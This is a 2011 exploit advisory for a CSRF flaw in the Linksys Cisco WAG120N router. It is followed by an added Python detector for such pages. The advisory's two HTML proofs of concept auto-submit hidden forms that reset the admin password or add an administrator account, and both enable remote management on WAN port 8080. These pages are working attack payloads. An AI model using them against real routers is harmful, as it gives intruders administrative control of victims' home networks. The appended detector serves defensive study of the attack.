Linksys Cisco WAG120N CSRF Vulnerability :: 2011-02-26
----------------------------------------------------------------
Hardware : Linksys Cisco WAG120N (and perhaps similar versions)
Type of vulnerability : CSRF (Change Admin Password and Add User)
Risk of use : High
----------------------------------------------------------------
Producer Website : http://linksysbycisco.com
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
CSRF For Change Admin Password :

# Use sysPasswd and sysConfirmPasswd to set the new password

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/setup.cgi" method="POST" name="form">
<input type="hidden" name="user_list" value="1">
<input type="hidden" name="h_user_list" value="1">
<input type="hidden" name="sysname" value="admin">
<input type="hidden" name="sysPasswd" value="password">
<input type="hidden" name="sysConfirmPasswd" value="password">
<input type="hidden" name="remote_management" value="enable">
<input type="hidden" name="http_wanport" value="8080">
<input type="hidden" name="upnp_enable" value="enable">
<input type="hidden" name="wlan_enable" value="enable">
<input type="hidden" name="igmp_proxy_enable" value="enable">
<input type="hidden" name="save" value="Save+Settings">
<input type="hidden" name="h_pwset" value="yes">
<input type="hidden" name="sysname_changed" value="yes">
<input type="hidden" name="pwchanged" value="yes">
<input type="hidden" name="pass_is_default" value="false">
<input type="hidden" name="h_remote_management" value="enable">
<input type="hidden" name="pass_is_none" value="no">
<input type="hidden" name="h_upnp_enable" value="enable">
<input type="hidden" name="h_wlan_enable" value="enable">
<input type="hidden" name="h_igmp_proxy_enable" value="enable">
<input type="hidden" name="todo" value="save">
<input type="hidden" name="this_file" value="Administration.htm">
<input type="hidden" name="next_file" value="Administration.htm">
<input type="hidden" name="message" value="">
<input type="hidden" name="h_wps_cur_status" value="">
</form>
</body>
</html>

----------------------------------------------------------------
CSRF For Add Administrator User :

# Use sysPasswd and sysConfirmPasswd to set the new password
# If you add a new user, you should set pass_is_none=yes

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/setup.cgi" method="POST" name="form">
<input type="hidden" name="user_list" value="2">
<input type="hidden" name="h_user_list" value="2">
<input type="hidden" name="sysname" value="ircrash">
<input type="hidden" name="sysPasswd" value="password">
<input type="hidden" name="sysConfirmPasswd" value="password">
<input type="hidden" name="remote_management" value="enable">
<input type="hidden" name="http_wanport" value="8080">
<input type="hidden" name="upnp_enable" value="enable">
<input type="hidden" name="wlan_enable" value="enable">
<input type="hidden" name="igmp_proxy_enable" value="enable">
<input type="hidden" name="save" value="Save+Settings">
<input type="hidden" name="h_pwset" value="yes">
<input type="hidden" name="sysname_changed" value="yes">
<input type="hidden" name="pwchanged" value="yes">
<input type="hidden" name="pass_is_default" value="false">
<input type="hidden" name="h_remote_management" value="enable">
<input type="hidden" name="pass_is_none" value="yes">
<input type="hidden" name="h_upnp_enable" value="enable">
<input type="hidden" name="h_wlan_enable" value="enable">
<input type="hidden" name="h_igmp_proxy_enable" value="enable">
<input type="hidden" name="todo" value="save">
<input type="hidden" name="this_file" value="Administration.htm">
<input type="hidden" name="next_file" value="Administration.htm">
<input type="hidden" name="message" value="">
<input type="hidden" name="h_wps_cur_status" value="">
</form>
</body>
</html>
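
A defender-side check, added here as an example and not part of the original advisory: it flags HTML (for instance, pages captured at a web proxy) whose body auto-submits a POST form to a private IP address carrying the router's password or remote-management fields. The field names come from the forms above; the function names, the heuristic, and the sample pages are assumptions constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names come from the advisory's forms; the heuristic itself is an assumption.
SENSITIVE_FIELDS = {"sysPasswd", "sysConfirmPasswd", "remote_management"}

class FormScanner(HTMLParser):
    """Collects each form's action, method and input names, plus the body onload handler."""
    def __init__(self):
        super().__init__()
        self.forms, self.onload = [], ""

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # the parser lowercases attribute names
        if tag == "body":
            self.onload = a.get("onload", "")
        elif tag == "form":
            self.forms.append({"action": a.get("action", ""),
                               "method": a.get("method", "get").lower(), "fields": set()})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].add(a.get("name", ""))

def targets_private_host(url):
    """True when the URL's host is a literal private (e.g. RFC 1918) IP address."""
    try:
        return ipaddress.ip_address(urlparse(url).hostname).is_private
    except (ValueError, TypeError):
        return False  # hostname is a DNS name, missing, or malformed

def find_router_csrf(html):
    """Return (action, matched_fields) for auto-submitted POST forms aimed at a private host."""
    scanner = FormScanner()
    scanner.feed(html)
    auto = "submit(" in scanner.onload.replace(" ", "")
    findings = []
    for f in scanner.forms:
        hits = sorted(f["fields"] & SENSITIVE_FIELDS)
        if auto and f["method"] == "post" and hits and targets_private_host(f["action"]):
            findings.append((f["action"], hits))
    return findings

# Constructed samples: a trimmed form in the advisory's shape, and an ordinary login page.
SAMPLE_BAD = ('<body onLoad=javascript:document.form.submit()>'
              '<form action="http://192.168.1.1/setup.cgi" method="POST" name="form">'
              '<input type="hidden" name="sysPasswd" value="x"></form></body>')
SAMPLE_OK = ('<body><form action="https://example.com/login" method="post">'
             '<input name="user"><input type="password" name="pass"></form></body>')
```

The check only looks at the body's onload attribute, so a page that submits the form from a separate script block would need an additional rule.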